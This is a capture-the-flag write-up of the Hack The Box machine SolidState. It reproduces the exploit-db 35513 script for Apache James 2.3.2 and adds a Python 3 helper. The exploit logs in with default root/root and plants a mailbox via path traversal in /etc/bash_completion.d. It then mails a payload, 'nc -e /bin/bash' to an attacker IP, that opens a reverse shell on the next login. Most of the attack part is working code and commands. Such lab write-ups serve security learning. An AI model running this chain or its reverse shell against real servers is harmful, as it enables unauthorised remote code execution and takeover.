HTB target machine: SolidState

This article is for technical exchange, learning and research only. Using the techniques described here for illegal purposes or to cause damage is strictly prohibited; the author bears no responsibility for any resulting consequences.

The machine is a retired box accessed with the author's VIP subscription; its IP address is shown as 10.10.10.51.

This time https://github.com/Tib3rius/AutoRecon is used for an automated, all-round scan.

Command executed:

autorecon 10.10.10.51 -o ./solidstate-autorecon

The scan shows port 4555 open, running the Apache James Remote Administration Tool (james-admin, version 2.3.2). With the default credentials root/root, this version allows an authenticated remote command execution: the admin tool's adduser command does not sanitise the user name, so a name containing ../ makes James create the new mailbox directory wherever the attacker chooses (here /etc/bash_completion.d). A mail sent to that user through SMTP on port 25 is then written as a file into that directory, and bash sources it the next time somebody logs in, running the payload embedded in the message body.

Corresponding exploit code: https://www.exploit-db.com/exploits/35513 (a Python 2 script, shown below with the author's payload already substituted; the string line breaks that were garbled on the original page are restored as \n):

#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16102014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d
#
# Note: Python 2 script (print statements, str-based sockets); run it with python2.

import socket
import sys
import time

# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user
#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
payload = 'nc -e /bin/bash 10.10.14.5 8833' # reverse shell back to the attacker's listener (adjust IP and port)
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
    sys.exit(1)

ip = sys.argv[1]

def recv(s):
    # read (and discard) the server's reply, then give the SMTP server a moment before the next command
    s.recv(1024)
    time.sleep(0.2)

try:
    # Step 1: log in to the admin tool on 4555 and create a user whose name traverses into /etc/bash_completion.d
    print "[+]Connecting to James Remote Administration Tool..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,4555))
    s.recv(1024)
    s.send(user + "\n")
    s.recv(1024)
    s.send(pwd + "\n")
    s.recv(1024)
    print "[+]Creating user..."
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
    s.recv(1024)
    s.send("quit\n")
    s.close()

    # Step 2: deliver a mail to that user; the stored message file is what bash will source on the next login
    print "[+]Connecting to James SMTP server..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,25))
    s.send("ehlo team@team.pl\n")
    recv(s)
    print "[+]Sending payload..."
    # the single quote in the sender address ends up in the Return-Path header; together with the lone ' line
    # in the body it turns all the mail headers into one quoted string, so the payload line runs as a command
    s.send("mail from: <'@team.pl>\n")
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\n") if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\n")
    recv(s)
    s.send("data\n")
    recv(s)
    s.send("From: team@team.pl\n")
    s.send("\n")
    s.send("'\n")
    s.send(payload + "\n")
    s.send("\n.\n")
    recv(s)
    s.send("quit\n")
    recv(s)
    s.close()
    print "[+]Done! Payload will be executed once somebody logs in."
except:
    print "Connection failed."

Exploitation:

The only change needed in the exploit is the payload, set to 'nc -e /bin/bash 10.10.14.5 8833' (10.10.14.5 is the attacker's VPN address; the target's nc must support -e). Then start a listener on port 8833 on the local Kali box, for example nc -lvnp 8833.

Run: python 35513.py 10.10.10.51

The script finishes with "Payload will be executed once somebody logs in": the file dropped in /etc/bash_completion.d is only sourced when a user on the box opens an interactive login shell, so wait for the reverse shell to arrive at the nc listener.
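The exploit above hard-codes the protocol exchange and the default credentials, and its bare except hides every failure. As an added example (not code from the blog post or from exploit-db), the Python 3 helper below covers the two steps described here: it builds the exact line sequences for the admin tool (port 4555) and for SMTP (port 25), refuses a payload that contains a single quote (which would close the quoting trick early and break the dropped script), and offers a credential check that logs in with root/root without creating any user, so the default-password condition can be confirmed before anything is written to the target. The banner, the "Password:" prompt and the "Welcome" reply are assumptions about James 2.3.2; the stand-in server is constructed only so the check runs offline.

```python
#!/usr/bin/env python3
"""Helpers for the Apache James 2.3.2 adduser/SMTP chain (added example, not the post's code)."""
import socket
import threading

JAMES_ADMIN_PORT = 4555
SMTP_PORT = 25
# bash sources every file in this directory on interactive login; the traversal
# makes James create the new mailbox directory inside it.
TRAVERSAL_USER = "../../../../../../../../etc/bash_completion.d"


def build_admin_commands(user="root", pwd="root", mailbox=TRAVERSAL_USER, mailbox_pw="exploit"):
    """Lines sent to the Remote Administration Tool on 4555, in order."""
    return [user, pwd, f"adduser {mailbox} {mailbox_pw}", "quit"]


def build_smtp_lines(payload, rcpt=TRAVERSAL_USER, sender="team@team.pl"):
    """Lines sent to SMTP on 25 so that the stored mail file parses as shell.

    The ' in MAIL FROM lands in the Return-Path header of the file James writes;
    everything up to the lone ' line in the body becomes one quoted string and the
    next line (the payload) is executed as a command when bash sources the file.
    A payload containing ' would close that string early, so it is rejected here.
    """
    if "'" in payload:
        raise ValueError("payload must not contain a single quote")
    if "\n" in payload or "\r" in payload:
        raise ValueError("payload must be a single line")
    domain = sender.split("@", 1)[1]
    return [
        f"ehlo {sender}",
        f"mail from: <'@{domain}>",
        f"rcpt to: <{rcpt}>",
        "data",
        f"From: {sender}",
        "",
        "'",
        payload,
        ".",
        "quit",
    ]


def _send_line(sock, line):
    sock.sendall(line.encode() + b"\r\n")


def _recv(sock, timeout=2):
    sock.settimeout(timeout)
    try:
        return sock.recv(4096).decode(errors="replace")
    except socket.timeout:
        return ""


def admin_login_ok(sock, user="root", pwd="root"):
    """True if the admin tool behind `sock` accepts user/pwd. Creates nothing on the target."""
    _recv(sock)                 # banner + "Login id:" prompt (assumed format)
    _send_line(sock, user)
    _recv(sock)                 # "Password:" prompt (assumed)
    _send_line(sock, pwd)
    reply = _recv(sock)         # "Welcome <user>. HELP for a list of commands" on success (assumed)
    _send_line(sock, "quit")
    return "Welcome" in reply


def check_default_creds(host, port=JAMES_ADMIN_PORT):
    """Network version of the check: python3 james_check.py style usage, e.g. check_default_creds('10.10.10.51')."""
    with socket.create_connection((host, port), timeout=5) as s:
        return admin_login_ok(s)


def _fake_james_admin(conn, accept):
    """Constructed stand-in for the 4555 service, used only to exercise admin_login_ok offline."""
    with conn:
        conn.sendall(b"JAMES Remote Administration Tool 2.3.2\r\n"
                     b"Please enter your login and password\r\nLogin id:\r\n")
        conn.recv(1024)         # login
        conn.sendall(b"Password:\r\n")
        conn.recv(1024)         # password
        conn.sendall(b"Welcome root. HELP for a list of commands\r\n" if accept
                     else b"Login failed for root\r\n")
        conn.recv(1024)         # quit


def selftest_default_creds(accept):
    """Run admin_login_ok against the stand-in over a socketpair; returns the check's verdict."""
    client, server = socket.socketpair()
    t = threading.Thread(target=_fake_james_admin, args=(server, accept))
    t.start()
    with client:
        result = admin_login_ok(client)
    t.join()
    return result
```

Usage: call check_default_creds("10.10.10.51") first; only if it returns True is there any point in sending build_admin_commands() and build_smtp_lines(payload) over the two sockets in the order the exploit uses. The single-quote check matters in practice: the exploit-db root-only payload uses double quotes precisely so that the quoting trick survives.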

This box is exactly the same as a VulnHub machine I did earlier; the manual walkthrough is at https://www.cnblogs.com/autopwn/p/13809602.html

A confused life needs constant effort before the blurry ambition in the distance comes into view!
Original article: https://www.cnblogs.com/autopwn/p/14023953.html